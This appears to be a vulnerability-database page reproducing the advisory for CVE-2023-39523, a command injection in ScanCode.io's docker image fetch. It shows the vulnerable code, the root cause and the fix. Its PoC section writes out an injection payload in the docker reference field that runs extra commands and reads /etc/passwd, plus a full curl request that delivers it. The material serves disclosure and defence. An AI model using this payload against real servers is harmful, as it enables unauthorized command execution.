6.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-39523

GHSA ID

GHSA-2ggp-cmvm-f62f

EPSS Score

0.81571%

CWE

CWE-77

Published

8/9/2023

Updated

11/4/2023

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2023-39523

CVE-2023-39523: ScanCode.io command injection in docker image fetch process

Command Injection in docker fetch process

Summary

A possible command injection in the docker fetch process as it allows to append malicious commands in the docker_reference parameter.

Details

In the function scanpipe/pipes/fetch.py:fetch_docker_image[1] the parameter docker_reference is user controllable. The docker_reference variable is then passed to the vulnerable function get_docker_image_platform.

def fetch_docker_image(docker_reference, to=None):
    """
    code snipped ....
    """
    platform_args = []
    platform = get_docker_image_platform(docker_reference) # User controlled `docker_reference` passed
   """
   code snipped...
   """

However, the get_docker_image_plaform function constructs a shell command with the passed docker_reference. The pipes.run_command then executes the shell command without any prior sanitization, making the function vulnerable to command injections.

def get_docker_image_platform(docker_reference):
    """
    Return a platform mapping of a docker reference.
    If there are more than one, return the first one by default.
    """
    skopeo_executable = _get_skopeo_location()
    """
    Constructing a shell command with user controlled variable `docker_reference`
    """
    cmd = (
        f"{skopeo_executable} inspect --insecure-policy --raw --no-creds "
        f"{docker_reference}"
    )

    logger.info(f"Fetching image os/arch data: {cmd}")
    exitcode, output = pipes.run_command(cmd) # Executing command
    logger.info(output)
    if exitcode != 0:
        raise FetchDockerImageError(output)

A malicious user who is able to create or add inputs to a project can inject commands. Although the command injections are blind and the user will not receive direct feedback without logs, it is still possible to cause damage to the server/container. The vulnerability appears for example if a malicious user adds a semicolon after the input of docker://;, it would allow appending malicious commands.

PoC

Create a new project with following input docker://;echo${IFS}"PoC"${IFS}&&cat${IFS}/etc/passwd in the filed Download URLs
Check docker logs to see the command execution

curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------2742275543734015476190112060' -H $'Content-Length: 923' -H $'Origin: http://localhost' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://localhost/project/add/' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \
    -b $'csrftoken=7H2chgA7jPHnXK0NNPftIoCW9z8SabKR' \
    --data-binary $'-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"csrfmiddlewaretoken\"\x0d\x0a\x0d\x0ayslGuNnvWloFUEUCWI5VlMuZ60ZDDSkFvZdIBTNs50VSHeKfznaeT0WL5pXlDTUm\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"name\"\x0d\x0a\x0d\x0apoc\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"input_files\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"input_urls\"\x0d\x0a\x0d\x0adocker://;echo${IFS}\"PoC\"${IFS}&&cat${IFS}/etc/passwd\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"pipeline\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\"execute_now\"\x0d\x0a\x0d\x0aon\x0d\x0a-----------------------------2742275543734015476190112060--\x0d\x0a' \
    $'http://localhost/project/add/'

Mitigations The docker_reference input should be sanitized to avoid command injections and it is not recommend to create commands with user controlled input directly.

Tested on:

Commit: Latest commit [bda3a70e0b8cd95433928db1fd4b23051bc7b7eb]
OS: Ubuntu Linux Kernel 5.19.0

References [1] https://github.com/nexB/scancode.io/blob/main/scanpipe/pipes/fetch.py#L185

(GitHub Advisory)

6.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-39523

GHSA ID

GHSA-2ggp-cmvm-f62f

EPSS Score

0.81571%

CWE

CWE-77

Published

8/9/2023

Updated

11/4/2023

KEV Status

Technology

Python

Technical Details

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
scancodeio	pip	<= 32.5.0	32.5.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from two key points:

fetch_docker_image accepts user-controlled docker_reference without validation (CWE-77)
get_docker_image_platform directly interpolates this input into a shell command string executed with pipes.run_command (which used shell=True pre-patch).

The PoC demonstrates injection via ;-separated commands in docker_reference. The commit fix added regex validation in fetch_docker_image and switched to safe subprocess execution in get_docker_image_platform, confirming these were the vulnerable points.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

## *omm*n* Inj**tion in *o*k*r **t** pro**ss ### Summ*ry * possi*l* *omm*n* inj**tion in t** *o*k*r **t** pro**ss *s it *llows to *pp*n* m*li*ious *omm*n*s in t** *o*k*r_r***r*n** p*r*m*t*r. ### **t*ils In t** *un*tion `s**npip*/pip*s/**t**.py:**t

Reasoning

T** vuln*r**ility st*ms *rom two k*y points: *. **t**_*o*k*r_im*** ****pts us*r-*ontroll** *o*k*r_r***r*n** wit*out v*li**tion (*W*-**) *. **t_*o*k*r_im***_pl*t*orm *ir**tly int*rpol*t*s t*is input into * s**ll *omm*n* strin* *x**ut** wit* pip*s.run_

6.8

Basic Information

Concerned about an active attack path?

CVE-2023-39523: ScanCode.io command injection in docker image fetch process

Command Injection in docker fetch process

Summary

Details

PoC

6.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI